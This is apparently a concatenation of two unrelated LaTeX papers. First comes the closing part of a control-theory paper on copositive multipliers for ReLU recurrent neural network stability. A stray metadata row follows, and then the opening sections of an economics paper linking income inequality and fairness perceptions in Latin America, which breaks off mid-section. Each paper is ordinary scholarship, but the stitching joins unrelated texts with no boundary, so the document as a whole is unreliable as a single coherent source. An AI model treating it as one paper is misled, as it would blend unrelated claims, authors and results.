\right]\succ 0\ \forall \Delta \in \bbD_\mathrm{ver}^n[0,1],\
Z_{ii}\le 0\ (i=1,\cdots,m)
\right\}. \hspace*{-20mm}
\end{array}$}
\label{eq:Mpol}
\end{equation}
Then, $\Pi\in \Pipol$ is a valid multiplier that satisfies \rec{eq:IQC0}
for the ReLU $\Phi$ given by \rec{eq:ReLU}.
\label{cor:pol}
\end{corollary}
We finally note that the denomination ``polytopic bounding''
comes from the historical reason that
the multipliers in \rec{eq:Pipol0} and \rec{eq:Pipol}
have been used to handle parametric uncertainties in polytopes
in the context of robust control \cite{Iwasaki_IEEE1998,Scherer_Automatica2001}.
\begin{remark}
Even though we restrict our attention
to the static Zames-Falb multiplier of the form \rec{eq:MZF} in \rco{cor:ZF},
it is true that the dynamical
finite impulse response (FIR) Zames-Falb multipliers
are also investigated in \cite{Fetzler_IFAC2017} in frequency domain.
We do not pursue such a direction in this paper
mainly because the novel copositive multipliers,
to be introduced in the next subsection,
rely on the analysis in time-domain.
However, we have a prospect that
the extension similar to the FIR multipliers in
\cite{Fetzler_IFAC2017} can also be achieved in time-domain
by means of discrete-time system lifting \cite{Bittanti_1996}.
Such an extension, and mutual relationship with the FIR multipliers
are currently under investigation.
Still, we have already obtained related results on the use
of the discrete-time system lifting in \cite{Ebihara_EJC2021}.
\end{remark}
\begin{remark}
As clarified exhaustively in \cite{Fetzler_IFAC2017},
the polytopic bounding multiplier encompasses
some existing and frequently used multipliers.
For instance,
the following so-called diagonally structured multiplier has been often employed
to handle sector-bounded nonlinearities $\Phi$ in \rle{le:sb}.
\[
\scalebox{0.85}{$
\begin{array}{@{}l}
\bPi_\mathrm{ds}[\alpha,\beta]:=
\left\{
\Pi \in\bbS^{2m}:\ \Pi=
\left[
\begin{array}{cc}
-\alpha\beta D & \dfrac{\alpha+\beta}{2} D \\
\ast & -D
\end{array}
\right],\
D\in\bbD_{++}^m
\right\}.
\end{array}$}
\]
Then it is very clear that
$\bPi_\mathrm{ds}[\alpha,\beta]\subset\Pipol[\alpha,\beta]\subset\Pispol[\alpha,\beta]$.
Since the effectiveness of the Zames-Falb multipliers is also widely
recognized,
we could say that $\Pi\in \Pipol + \PiZF$ is the most up-to-date,
effective, and numerically tractable existing (static) multiplier to
handle the ReLU.
\end{remark}
\subsection{Novel Copositive Multiplier}
It has been shown recently in \cite{Raghunathan_NIPS2018}
that the input-output relationship of the ReLU given by
\rec{eq:ReLU} can be fully captured by
three (in)equalities.
Similar observation can also be found in \cite{Groff_CDC2019}.
Namely, $\zeta=\phi(\xi)$ holds
for the input $\xi\in\bbR$ and output $\zeta\in\bbR$
of the ReLU if and only if
\begin{equation}
\zeta(\zeta-\xi)=0,\ \zeta\ge 0,\ \zeta-\xi\ge 0.
\label{eq:ReLU2}
\end{equation}
The first constraint is quadratic on the input and output signals
and hence compatible with IQCs.
In fact, this constraint can be regarded as the extreme case of
the sector bounded nonlinearity $\phi\in\sec[0,1]$.
From this constraint,
we can also ensure that $\Pi\in \Pipol$ is a valid multiplier satisfying
\rec{eq:IQC0}.
On the other hand, the second and third constraints are
{\it linear} with respect to the input and output signals.
Therefore they do not conform to the IQC framework
if we merely rely on the standard positive semidefinite cone $\PSD$.
This is because the cone $\PSD$ has no
functionality to distinguish nonnegative vectors
in the quadratic form.
To get around this difficulty, we employ copositive cone
$\COP$ and introduce the copositive multipliers.
This result is summarized in the next theorem.
\begin{theorem}
Let us define
\begin{equation}
\scalebox{0.83}{$
\begin{array}{@{}l}
\arraycolsep=0.5mm
\PisCOP:=
\left\{\Pi\in \bbS^{2m}:\ \Pi=
(\ast)^T Q
\left[
\begin{array}{cc}
-I_m & I_m\\
0 & I_m\\
\end{array}
\right],\ Q\in \COP_{2m}
\right\}.
\end{array}$}
\label{eq:MCOPs}
\end{equation}
Then, $\Pi\in \PisCOP$ is a valid multiplier that satisfies \rec{eq:IQC0}
for the ReLU $\Phi$ given by \rec{eq:ReLU}.
\label{th:COP}
\end{theorem}
\begin{remark}
As stated in \rsec{sec:cop}, it is hard to check whether
$Q\in \COP_{2m}$ holds in \rec{eq:MCOPs} and hence
the copositive multiplier \rec{eq:MCOPs} is intractable in general.
To get around this difficulty, we apply inner approximation to the
copositive cone $\COP$ and define
%
\begin{equation}
\scalebox{0.72}{$
\begin{array}{@{}l}
\arraycolsep=0.5mm
\PiCOP:=
\left\{\Pi\in \bbS^{2m}:\ \Pi=
(\ast)^T Q
\left[
\begin{array}{cc}
-I_m & I_m\\
0 & I_m\\
\end{array}
\right],\ Q\in \PSD_{2m}+\NN_{2m}
\right\}.
\end{array}$}
\label{eq:MCOP}
\end{equation}
%
Then, it is clear from \rec{eq:inc1} that $\PiCOP\subset \PisCOP$
and hence $\Pi\in\PiCOP$ is a valid multiplier that satisfies \rec{eq:IQC0}
for the ReLU $\Phi$ given by \rec{eq:ReLU}.
In particular, $\PiCOP=\PisCOP$ holds if $m\le 2$.
It should be noted that checking $Q\in \PSD_{2m}+\NN_{2m}$ is
numerically tractable since this is essentially a positive semidefinite
constraint.
\end{remark}
\begin{remark}
In relation to the copositive multiplier \rec{eq:MCOP},
let us consider its special class given by
\[
\scalebox{0.73}{$
\begin{array}{@{}l}
\arraycolsep=0.5mm
\PiCOPz:=
\left\{\Pi\in \bbS^{2m}:\ \Pi=
(\ast)^T
\left[
\begin{array}{cc}
0 & 0 \\
0 & \hatQ
\end{array}
\right]
\left[
\begin{array}{cc}
-I_m & I_m\\
0 & I_m\\
\end{array}
\right],\ \hatQ\in \PSD_{m}+\NN_{m}
\right\}.
\end{array}$}
\]
Then, we can see from \cite{Ebihara_EJC2021} that
the condition \rec{eq:RNNIQC} with $\Pi\in \PiCOPz$
is a sufficient condition for the $l_{2+}$-induced-norm-based
scaled small gain condition $\|D^{-1}G_0D\|_{2+}< 1$ with $D\in\bbD_{++}^m$.
Since the ReLU only returns nonnegative signals,
we intuitively deduce that $\|D^{-1}G_0D\|_{2+}< 1$ could be a
sufficient condition for the stability.
We have validated this as the main result in \cite{Ebihara_EJC2021},
providing also the numerically verifiable condition
\rec{eq:RNNIQC} with $\Pi\in \PiCOPz$.
Since $\PiCOPz\subset \PiCOP$ does hold,
we can conclude that
the present result encompasses the main result of
\cite{Ebihara_EJC2021}
as a special case.
\end{remark}
\begin{remark}
The treatment of nonnegative signals is the
core for the analysis of positive systems,
and to acitively use the nonnegativity in the analysis
the integral {\it linear} constraints are introduced in \cite{Briat_IJRN2013}.
However, to build an effective stability analysis method of RNNs upon
the powerful IQC approach with existing multipliers,
we have to capture the nonnegativity of the signals in {\it quadratic} form.
This is the reason why we introduced copositive multipliers.
\end{remark}
\section{Numerical Examples}
In \rec{eq:RNN}, let us consider the case
$\Lambda=0$, $\Wout=I_6$ and
\[
\scalebox{0.9}{$
\begin{array}{@{}l}
\Win=
\left[
\begin{array}{rrrrrr}
0.29 & -0.04 & 0.02+a & -0.35 & -0.05 & -0.12\\
-0.29 & -0.24 & -0.01 & 0.12 & -0.13 & 0.18\\
-0.50 & b & 0.23 & 0.40 & -0.28 & -0.08\\
0.14 & -0.27 & -0.15 & 0.13 & -0.47 & -0.28\\
-0.10 & -0.10 & 0.08 & 0.14 & -0.22 & 0.50\\
-0.11 & -0.28 & -0.21 & -0.14 & -0.09 & 0.20\\
\end{array}
\right].
\end{array}$}
\]
For $(a,b)=(0,0)$, we see $\|G_0\|_2=0.9605$.
Here we examined the finite gain $l_2$ stability
over the (time-invariant) parameter variation
$a\in[-2,2]$ and $b\in [-10,10]$.
This example is exactly the same as that of \cite{Ebihara_EJC2021}
except for the range of the parameter variation.
We tested the following stability conditions: \\
\ul{Test I (SSG):}\
Find $P\in \PSD_n$, $S\in\bbD_{++}^m$ such that
\rec{eq:RNNIQC} holds with $\Pi=0$. \\
\ul{Test II ($l_{2+}$-SSG):}\
Find $P\in \PSD_n$, $S\in\bbD_{++}^m$, and
$\Pi\in \PiCOPz$ such that \rec{eq:RNNIQC} holds. \\
\ul{Test III (SSG+ZF+PolB):}\
Find $P\in \PSD_n$, $S\in\bbD_{++}^m$ and
$\Pi\in \PiZF+\Pipol$ such that \rec{eq:RNNIQC} holds. \\
\ul{Test IV (SSG+ZF+PolB+COP):}\
Find $P\in \PSD_n$, $S\in\bbD_{++}^m$ and
$\Pi\in \PiZF+\Pipol+\PiCOP$ such that \rec{eq:RNNIQC} holds.
It is very clear that if Test I is feasible then Tests II and III are,
and if Test III is feasible then Test IV is.
However, there is no theoretical inclusion relationship between Test II and
Test III.
Test I corresponds to the scaled small gain condition with the standard
$l_2$ induced norm,
while
Test II corresponds to the scaled small gain condition with
the $l_{2+}$ induced norm.
These have been already implemented in \cite{Ebihara_EJC2021},
but we retested them since we changed the range of the parameter variation.
In \rfig{fig:comp1},
we plot $(a,b)$ for which the RNN is proved to be stable
by Tests I and II.
Both Tests turned out to be feasible
for $(a,b)$ in the green region,
whereas only Test II turned out to be feasible
for $(a,b)$ in the magenta region.
On the other hand, in \rfig{fig:comp2},
both Tests III and IV turned out to be feasible
for $(a,b)$ in the red region,
whereas only Test IV turned out to be feasible
for $(a,b)$ in the blue region.
From both figures, we can confirm the effectiveness of the
copositive multipliers.
As for the comparison between Tests II and III,
Test III tuned out to be feasible in much larger region than that of
Test II, but there is no strict inclusion relationship between them.
In fact, for $(a,b)=(1.0,1.4)$,
Test II and III turned out to be feasible and infeasible, respectively.
\section{Conclusion and Future Works}
In this paper, we dealt with the stability analysis of the RNN with the ReLU
by means of the IQC framework.
By actively using the nonnegativity property of the ReLU,
we newly introduced the copositive multipliers.
We showed that we can employ copositive multipliers (or their inner approximation)
together with existing multipliers such as
Zames-Falb multipliers and polytopic bounding multipliers,
and this directly enabled us to ensure that the introduction of
copositive multipliers leads to better (no more conservative) results.
By numerical examples, we illustrated the effectiveness of the
copositive multipliers.
In the present paper and \cite{Ebihara_EJC2021},
we converted a COP to an SDP
by simply replacing $\COP$ by $\PSD+\NN$.
However, this treatment is conservative. In this respect,
Lasserre \cite{Lasserre_2014} and
Klerk and Pasechnik \cite{De_SIAM2002}
have already shown independently how to
construct a hierarchy of SDPs to solve COP
in an asymptotically exact fashion, but
the size of SDPs grows very rapidly.
This is prohibitive to deal with realistic, larger size networks.
To get around this difficulty,
we plan to rely on efficient first-order methods to
solve the specific conic relaxations arising from
polynomial optimization problems with sphere constraints
\cite{Mai_arXiv2020}.
\begin{figure}[t]
\begin{center}
\vspace*{-2mm}
\includegraphics[scale=0.50]{SGvsSG.pdf}
\vspace*{-6mm}
\caption{Comparison: Test I vs Test II. }
\label{fig:comp1}
\end{center}
\vspace*{-4mm}
\begin{center}
\includegraphics[scale=0.50]{ZFpol+COP.pdf}
\vspace*{-6mm}
\caption{Comparison: Test III vs Test IV. }
\label{fig:comp2}
\vspace*{-8mm}
\end{center}
\end{figure}
\input{final.bbl}
\end{document}
| 2024-02-18T23:40:02.194Z | 2022-02-10T02:26:21.000Z | algebraic_stack_train_0000 | 1,145 | 5,912 |
|
proofpile-arXiv_065-5664 | \subsubsection{\@startsection{subsubsection}{3}{\z@
{-3.25ex\@plus -1ex \@minus -.2ex
{-1.5ex \@plus -.2ex
{\normalfont\normalsize\bfseries}}
\def\@biblabel#1{\hspace*{-\labelsep}}
\newcommand*\circled[1]{\tikz[baseline=(char.base)]{
\node[shape=circle,draw,inner sep=2pt] (char) {#1};}}
\newcommand*\ExpandableInput[1]{\@@input#1 }
\makeatother
\def\sym#1{\ifmmode^{#1}\else\(^{#1}\)\fi}
\onehalfspacing
\pdfpageheight\paperheight
\pdfpagewidth\paperwidth
\newcolumntype{L}[1]{>{\raggedright\let\newline\\\arraybackslash\hspace{0pt}}m{#1}}
\newcolumntype{C}[1]{>{\centering\let\newline\\\arraybackslash\hspace{0pt}}m{#1}}
\newcolumntype{R}[1]{>{\raggedleft\let\newline\\\arraybackslash\hspace{0pt}}m{#1}}
\begin{document}
\title{Are Fairness Perceptions Shaped by Income Inequality? Evidence from Latin America\thanks{\noindent Gasparini: Centro de Estudios Distributivos, Laborales y Sociales (CEDLAS) - IIE-FCE, Universidad Nacional de La Plata and CONICET (e-mail: \text{lgasparini@cedlas.org}). Reyes: Cornell University (e-mail \text{gjr66@cornell.edu}). For helpful comments, we thank Carolina Garc\'ia Domench, Giselle Del Carmen, Rebecca Deranian, Luis Laguinge, participants of the 2021 Annual Bank Conference on Development Economics, and two anonymous referees. A previous version of this article circulated as ``Perceptions of Distributive Justice in Latin America during a Period of Falling Inequality.'' Errors and omissions are our own.}}
\author{Leonardo Gasparini \and Germ\'an Reyes}
\date{\vspace{15pt} February 2022}
\maketitle
\begin{abstract}
\noindent A common assumption in the literature is that the level of income inequality shapes individuals' beliefs about whether the income distribution is fair (``fairness views,'' for short). However, individuals do not directly observe income inequality (which often leads to large misperceptions), nor do they consider all inequities to be unfair. In this paper, we empirically assess the link between objective measures of income inequality and fairness views in a context of high but decreasing income inequality. We combine opinion poll data with harmonized data from household surveys of 18 Latin American countries from 1997--2015. We report three main findings. First, we find a strong and statistically significant relationship between income inequality and unfairness views across countries and over time. Unfairness views evolved in the same direction as income inequality for 17 out of the 18 countries in our sample. Second, individuals who are older, unemployed, and left-wing are, on average, more likely to perceive the income distribution as very unfair. Third, fairness views and income inequality have predictive power for individuals' self-reported propensity to mobilize and protest independent of each other, suggesting that these two variables capture different channels through which changes in the income distribution can affect social unrest. \\
\end{abstract}
\clearpage
\input{1-intro}
\input{2-data}
\input{3-inequality-fairness}
\input{4-correlates-fairness}
\input{5-fairness-protests}
\input{6-conclusions}
\clearpage
\input{7-figures}
\clearpage
\begin{singlespace}
\bibliographystyle{chicago}
\section{Introduction}
Several theoretical and empirical papers study how objective measures of income inequality affect individual-level behavior.\footnote{Researchers have studied how income inequality affects cooperation \citep{cozzolino2011trust}, demand for redistribution \citep{meltzer1981rational, finseraas2009income}, dishonesty \citep{neville2012economic}, social cohesion \citep{alesina1996income}, subjective wellbeing \citep{oishi2011income}, and trust \citep{gustavsson2008inequality}.} Implicit in much of this literature is the assumption that inequality shapes individuals' beliefs about whether the income distribution is fair (``fairness views,'' for short).\footnote{For example, one important reason why social cohesion might be related to income inequality is that, as inequality increases, more individuals perceive the income distribution as unfair, making them more prone to mobilize. Similarly, we would not expect inequality to be negatively linked to subjective wellbeing if increases in income disparities were perceived as fair.} However, two pieces of evidence suggest that the link between inequality and fairness views is not straightforward. First, fairness views are not informed by objective measures of inequality---since these are not directly observable by individuals---but instead by perceived inequality. Research about how accurately people perceive income inequality shows large gaps between individuals' perceptions and the actual levels of inequality \citep{norton2011building,kuziemko2015elastic, gimpelson2018misperceiving, choi2019revisiting}. Second, even absent any misperceptions, individuals do not consider all inequities to be unfair. Specifically, individuals largely accept income disparities derived from personal choices and effort, but deem inequities driven by luck or chance as unfair \citep{cappelen2007pluralism, alesina2011preferences, cappelen2013just, almaas2020cutthroat}. Thus, the extent to which fairness perceptions are shaped by income inequality remains an important empirical question.
In this paper, we empirically study the link between fairness views and income inequality in a particular scenario: a region of highly unequal countries---Latin America---but during a period in which inequality pronouncedly declined. First, we assess the extent to which fairness views are linked to income inequality, both across countries and over time. Then, we analyze how individual-level factors such as education, political ideology, and religious views relate to fairness views. Finally, we investigate the predictive power of fairness views for individuals' propensity to protest and mobilize.
In Section \ref{sec_context_data}, we describe the institutional context and our data. Our setting is Latin America, one of the most unequal regions in the world \citep{alvaredo2015recent}. We focus on the 2000s, an unusual period in that income inequality saw a widespread decrease across countries in the region \citep{gasparini2011recent}. To relate income inequality to fairness views, we combine data from two harmonization projects. Our source for income inequality data is SEDLAC, a project that increases cross-country comparability of household surveys. These data enable us to compare the evolution of income inequality across countries and over time. The data on fairness perceptions come from public opinion polls conducted by Latinobar\'ometro in 18 Latin American countries since the 1990s.
In Section \ref{sec_ineq_fairness}, we document a series of stylized facts about fairness views in the region. A strikingly high, albeit decreasing, share of the population believes that the income distribution in their country is unfair. In 2002, almost nine out of ten individuals perceived the income distribution as unfair (86.6\%). By 2015, this figure declined to 75.1\%. This decline is particularly striking considering that previous research highlights people's tendency to report perceptions of stable or increasing inequality, regardless of its actual evolution \citep{gimpelson2018misperceiving}.
Next, we link fairness views to income inequality. We study how the Gini coefficient---our main measure of inequality---correlates with fairness views across countries and over time. We find a strong linear correlation between the Gini coefficient and the percent of the population that perceives inequality as unfair across country-years. Fairness views evolved in the same direction as the Gini in 17 out of the 18 countries in our sample during the 2000s.
The decline in income inequality during the 2000s---although remarkable by historical standards---was not enough to substantially modify the view of Latin Americans with respect to distributive fairness in their societies. Three out of four citizens of the region still believe that the income distribution is unfair. A one percentage point decrease in the Gini is associated with a 1.4 percentage point decrease in the share of the population perceiving the income distribution as unfair. Holding constant this elasticity and the pace of inequality reduction of the 2000s, reducing the population that perceives inequality as unfair to 50\% would take roughly more than a decade.
Next, we investigate whether inequality measures other than the Gini coefficient are stronger predictors of unfairness beliefs. This question is of interest in its own right, given the ongoing debate on whether income inequality should be measured with relative or absolute indicators \citep{ravallion2003debate, atkinson2010analyzing}. We take an agnostic approach and correlate a large number of relative and absolute measures of inequality with unfairness views. We find that relative indicators are strongly positively correlated with people's perceptions of unfairness. In contrast, absolute indicators tend to be \textit{negatively} correlated with unfairness views. This is because absolute income gaps became wider in Latin America in the booming years under analysis, yet perceptions about unfairness went down.
In Section \ref{sec_corr_fairness}, we assess whether the correlation between income inequality and fairness views is robust to controlling for observable variables and investigate which individual-level characteristics are predictive of fairness views. The relationship between unfairness views and the Gini coefficient is positive and statistically significant even after controlling for country fixed effects, year fixed effects, and a large set of individual-level characteristics. We find that older, unemployed, and left-wing individuals are more likely to perceive income distribution as very unfair. A decomposition exercise shows that the decline in unfairness perceptions during the 2000s is better accounted for by income inequality trends rather than changes in the composition of the population.
In Section \ref{sec_unrest}, we analyze the link between fairness perceptions and individuals' self-reported propensity to protest. A vast literature relates income inequality to social cohesion, conflict, and activism. One might expect this link to be partly mediated by fairness views. Hence, we study whether fairness views have predictive power for social unrest, conditional on income inequality. To do this, we measure individuals' likelihood of participating in different political activities, such as mobilizing in a demonstration, signing a petition, refusing to pay taxes, or complaining on social media. Participation in these activities is self-reported, so the results should be interpreted with caution. With this caveat in mind, we find that both fairness views and inequality have predictive power independent of each other for some political activities, such as complaining on social media. Other behaviors are exclusively predicted by fairness views (e.g., signing a petition) or by income inequality (e.g., refusing to pay taxes). This suggests that both fairness views and income inequality are important determinants of the propensity to engage in political activism.
This paper contributes to the literature that links objective measures of the income distribution to individuals' perceptions of such measures. Previous papers have shown that individuals tend to misperceive their relative incomes \citep{cruces2013biased, karadja2017richer, hvidberg2020social, fehr2021your} and other relevant features of the income distribution, such as the level of inequality, poverty, and mobility \citep{kuziemko2015elastic, page2016subjective, alesina2018intergenerational, preuss2020}.\footnote{Mismatches between beliefs and reality are important because there is mounting evidence that perceptions of facts, more than facts themselves, affect individual behavior. For example, demand for redistribution is affected more by perceptions of the income distribution than by the actual distribution \citep{gimpelson2018misperceiving, choi2019revisiting}. Thus, understanding what people believe about the income distribution is important from a policy perspective. If there are mismatches between perceptions and reality, interventions that make information less costly or more salient might be desirable.} Evidence on the relationship between fairness perceptions and income inequality, particularly in Latin America, is rather scarce. To our knowledge, the only other paper that studies the link between inequality and fairness views in the region is \cite{zmerli2015income}, although the focus of this paper is on political trust. Using the same data that we use, the authors find a positive association between unfairness views and the Gini. However, the authors only use data from one year. Hence, they cannot study the joint evolution of both variables over time or control for unobserved heterogeneity at the country or year level, which, as we argue below, could generate a spurious correlation between income inequality and fairness views. We contribute to this literature by providing novel empirical evidence linking fairness views to income inequality in a highly unequal region, but during a period of falling inequality.\footnote{A related literature exploits opinion surveys to study distributive issues in Latin America. \cite{cepal2010america} documents patterns of perceptions of distributive inequity during 1997--2007. Using data from Argentina, \cite{rodriguez2014percepciones} shows that people who consider their income to be fair tend to perceive lower levels of inequality. \cite{martinez2020latin} explore the effect of immigration on preferences for redistribution in Latin America.}
This paper also contributes to the literature on inequality measurement. This literature makes a crucial distinction between two types of inequality indicators: the relative ones (such as the Gini coefficient) and absolute ones (such as the variance). Relative and absolute indicators often provide different answers to important issues such as the distributive effects of globalization or trade openness \citep{ravallion2003debate, atkinson2010analyzing}. Hence, it is important to understand whether people think about distributive fairness through the lens of relative or absolute indicators. We show that relative indicators have a much stronger correlation with fairness views than absolute indicators.
Finally, we make a small contribution to the growing literature that relates income inequality---and more recently, measures of polarization---to conflict and political activism \citep{esteban2011linking, esteban2012ethnicity}. Previous papers have shown that income inequality is predictive of conflict and social unrest. We contribute to this literature by showing that fairness views have predictive power for social unrest above and beyond income inequality (and vice-versa).
\section{Institutional Context, Data, and Descriptive Statistics} \label{sec_context_data}
This section provides institutional context on Latin America, describes our data, and provides summary statistics on our sample.
\subsection{Context} \label{subsec_context}
Latin America has long been characterized as a region with high levels of income inequality. Together with South-Saharan Africa, Latin America is one of the two most unequal regions in the world \citep{alvaredo2015recent,world2016poverty}. After a period of increasing inequality during the 1980s and 1990s, the region experienced a ``turning point'' in the 2000s, when income inequality saw a widespread decrease \citep{gasparini2011recent, gasparini2011rise, lustig2013declining}.\footnote{The widespread decline in inequality contrasts to what happened in other developing regions in the world, where inequality modestly decreased (e.g., such as in the Middle East and North Africa), or even increased (such as in East Asia and Pacific, \citealp[c.f.][]{alvaredo2015recent}). In developed countries, inequality tended to increase \citep{atkinson2011top}.}
\subsection{Data} \label{subsec_data}
We use data on fairness views and income inequality from 18 Latin American countries from 1997--2015. The data comes from two harmonization projects, known as Latinobar\'ometro and SEDLAC (Socio-Economic Database for Latin America and the Caribbean).
We use public opinion polls conducted by Latinobar\'ometro to measure fairness perceptions. Latinobar\'ometro conducts opinion surveys in Latin American countries, interviewing about 1,200 individuals per country. The survey is designed to be representative of the voting-age population at the national level (in most Latin American countries, individuals aged over 18).\footnote{In Appendix Table \ref{tab-coverage} we show the percentage of the voting-age population represented by the opinion polls in our sample for the years in which fairness data is available.} The main variable for our empirical analysis is individuals' fairness views, which we measure using the following question: \textit{``How fair do you think the income distribution is in [country]? Very fair, fair, unfair or very unfair?''} We construct binary variables indicating whether individuals believe that the income distribution is unfair or very unfair.\footnote{Latinobar\'ometro does not ask respondent \textit{why} they believe that the income distribution is unfair. It is possible that some people view the distribution as unfair because existing disparities are not sufficiently large. We think that this is unlikely and interpret unfairness views as reflective of too much inequality.}
Income inequality data comes from SEDLAC, a joint project between CEDLAS-UNLP and The World Bank, which increases cross-country comparability from official household surveys. We measure inequality in household income per capita (measured in 2005 USD at purchasing power parity). Whenever possible, we use comparable annual household surveys to calculate inequality indicators. However, some countries do not conduct surveys every year, and some of the household surveys available in a given country are not comparable over time (usually, due to important methodological changes). In Appendix \ref{sec_data} we describe the partial fixes we implement to maximize the sample size. In two countries of our sample (Argentina and Uruguay), the household survey is representative of urban areas only.
\subsection{Sample and Summary Statistics} \label{subsec_sample}
For our regression analysis, we use individual-level data. Our sample includes all individuals in the 11 different waves of Latinobar\'ometro surveys over 1997--2015.
Appendix Tables \ref{tab-sum-stats} and \ref{tab-fairness-grp} show descriptive statistics on our sample. The average respondent is 39.7 years old. Roughly half of the respondents are men (49\%), over half (56.3\%) are married or in a civil union, and 68\% are Catholics. The majority of respondents (76\%) completed at least elementary school, while a third of them (33.6\%) had completed high school or more. Almost two-thirds of the sample (64\%) were part of the labor force, and 9.9\% of the economically active individuals were unemployed.\footnote{In Appendix \ref{app_lb_sedlac}, we show that Latinobar\'ometro's sample is similar to the sample in SEDLAC.}
\section{The Relationship between Fairness Views and Inequality} \label{sec_ineq_fairness}
This section first provides descriptive evidence on the evolution of fairness views in Latin America from 1997 to 2015. Then, we link fairness perceptions to income inequality both across countries and over time. Finally, we investigate whether absolute or relative inequality indicators have a stronger predictive power for fairness views.
\subsection{The Evolution of Fairness Views in Latin America during the 2000s}
Figure \ref{fig-fairness-views} shows how fairness views evolved over time (Panel A) and across countries (Panel B). Panel A plots the fraction of individuals who believe that the income distribution of their country is very unfair, unfair, fair, or very fair over 1997--2015, pooling across all countries in our sample. Panel B shows the fraction of individuals who believe that the income distribution is either unfair or very unfair in each country of our sample during 2002 and 2015.
Figure \ref{fig-fairness-views}, Panel A shows that a strikingly high, albeit decreasing, share of the population believes that the distribution of income is unfair. In 2002, almost nine out of ten individuals perceived the income distribution as unfair (86.6\%). By 2015, this figure declined to 75.1\%. The decrease in unfairness perceptions was driven mainly by individuals with strong beliefs about unfairness (i.e., individuals who believe that the income distribution was very unfair). While in 2002, 33.1\% of the population perceived the income distribution as very unfair, this figure declined to 25.8\% by 2015. In contrast, weak beliefs about unfairness (i.e., individuals who believe that the income distribution was merely unfair) behaved more erratically, increasing at the beginning of our sample and decreasing by the end of the period. Overall, the share of individuals with weak beliefs about unfairness slightly declined during the 2000s, from 53.5\% in 2002 to 49.2\% in 2015. On the other hand, the share of the population that believe that the income distribution is fair doubled from 11.3\% in 2001 to 22.6\% in 2015
Figure \ref{fig-fairness-views}, Panel B shows that, while most individuals perceive the income distribution as unfair, fairness perceptions improved in most countries during 2002--2013. A substantial share of the population in all countries perceived the income distribution as unfair in both 2002 and 2013. For example, in 2002, the share of the population that perceived the distribution as unfair ranged from 74.5\% in Venezuela to 97.7\% in Argentina (which, at the time, was in the midst of a severe economic crisis). Throughout the following decade, there was a widespread decrease in the share of the population that perceived income inequality as unfair or very unfair. Compared to 2002, in 2013, a lower fraction of the population perceived the income distribution as unfair in 16 out of the 18 countries in our sample. The change in fairness perceptions ranged from modest decreases, like in Chile, where the decline was of less than one percentage point, to remarkable reductions, like in Ecuador, where perceptions about unfairness declined from 87.5\% to 38.6\%.
Appendix Figure \ref{fig-fairness-grps} shows that the decline in unfairness perceptions was widespread across heterogeneous groups of the population. To show this, we study how fairness views evolved for different subgroups of the population, according to individuals’ age, gender, education, and employment. This analysis reveals that young individuals are less likely to perceive the income distribution as unfair (Panel A), while females are more likely to do so, although with some heterogeneity across time (Panel B). Similarly, individuals with a higher educational achievement (Panel C) and the unemployed (Panel D) are more likely to believe that the income distribution is unfair. Importantly, the perception of unfairness consistently fell across all these subpopulations during the 2000s.
Next, we explore the extent to which these changes in fairness views were accompanied by changes in the actual distribution of income.
\subsection{Fairness Perceptions and Income Inequality: Some Stylized Facts}
Figure \ref{fig-fairness-gini} shows how fairness views evolved vis-\`a-vis changes in income inequality. Panel A shows a binned scatterplot of the Gini coefficients and unfairness views for all country-years in our sample. Panel B plots the percentage point change in unfairness perceptions between 2002 and 2013 on the $y$-axis against the change in the Gini over the same period on the $x$-axis.
Panel A shows that unfairness perceptions and income inequality are strongly correlated across country-years. The linear correlation between the Gini and unfairness perceptions across country-years is $0.93$ ($p < 0.01$). The share of the population who perceive income as unfair or very unfair ranges from 63\% in country-years with a Gini in the 0.40 bin (roughly, the average level of inequality in Venezuela during the 2000s), to 88\% in country-years with a Gini in the 0.60 bin (roughly, the level of inequality in Honduras during the early 2000s).\footnote{An OLS regression of unfairness views on the Gini estimated on the plotted points yields an intercept of 28.2. This implies that, even in a society where all incomes are equalized, about 28\% of the population would still perceive the income distribution as unfair. This exercise relies on the strong assumption that the relationship between fairness views and income inequality is linear. While such a relationship indeed appears to be linear in Panel A, our data only covers a very narrow range of Gini coefficients (between 0.40 and 0.60). It is likely that the relationship is non-linear for Gini coefficients close to zero or one.} The correlation between unfairness views and the Gini is driven by individuals who perceive inequality as very unfair. The correlation between perceptions of a very unfair distribution and the Gini is sizable and statistically significant. In contrast, the correlation between perceptions of a merely unfair distribution and the Gini is small and indistinguishable from zero.
Panel B shows that the evolution of fairness views tends to mirror the evolution of income inequality at country level. Fairness views moved in the same direction as the Gini in 17 out of the 18 countries in our sample. The one exception is Honduras, where, despite falling inequality, the population perceived the distribution as more unjust. Most countries lie in the third quadrant, where both the Gini and unfairness perceptions decreased. The only country where inequality increased (Costa Rica), also saw an increase in unfairness beliefs. In Appendix Figure \ref{fig-timeseries-gini-unfair} we show that the correlation between the Gini and unfairness views over time is also strong when pooling across countries. In this case, the linear correlation is equal to 0.80 ($p < 0.01$). During 2002--2013, a one percentage point decrease in the Gini was associated with a 1.4 percentage point decrease in the share of the population perceiving the distribution as unfair. To put this figure in context, this means that, at the pace of inequality reduction of the 2000s, it would roughly take Latin America more than a decade to reduce the population that perceives income inequality as unfair to 50\%.
\subsection{Is Fairness Absolute or Relative?} \label{sec_abs_fairness}
The literature on inequality measurement makes a crucial distinction between two types of indicators: relative ones (such as the Gini) and absolute ones (such as the variance). Relative indicators fulfill the scale-invariant axiom, while the absolute indicators meet the translation-invariant axiom.\footnote{These two axioms yield different implications for how inequality responds to a proportional change in the income of the entire population. A proportional income increase does not generate changes in income inequality as measured by relative indicators, but can provoke a large increase in inequality as measured by absolute indicators.} The question of which indicator should be used in practice has led to a heated debate in the literature \citep{milanovic2016global}. This is because relative and absolute indicators often provide different answers to important issues such as the distributive effects of globalization or trade openness.\footnote{As measured by absolute indicators, globalization has deteriorated the income distribution since the absolute income difference between the rich and the poor has increased. However, under the lens of relative measurement, globalization reduced income inequality since the poor's income has grown proportionally more than the income of the rich.}
To shed some light on this debate, we assess whether people think about distributive fairness through the lens of relative or absolute indicators. To do this, we take a data-driven approach. We calculate 13 different measures of income inequality for all the countries in our sample and correlate each inequality indicator with the share of the population that believes income distribution is unfair over time.\footnote{The indicators are the Gini coefficient, the ratio between the 75th percentile and the 25th percentile of the income distribution, the ratio between the 90th and 10th percentile, the Atkinson index with an inequality aversion parameter equal to 0.5 and 1, the mean log deviation, the Theil index, the Generalized entropy index, the coefficient of variation, the absolute Gini, the Kolm index with an inequity aversion parameter equal to one, and the variance of the per capita household income (in 2005 PPP). These last three indices correspond to the absolute inequality measures, while the other ten indicators are relative inequality measures.}
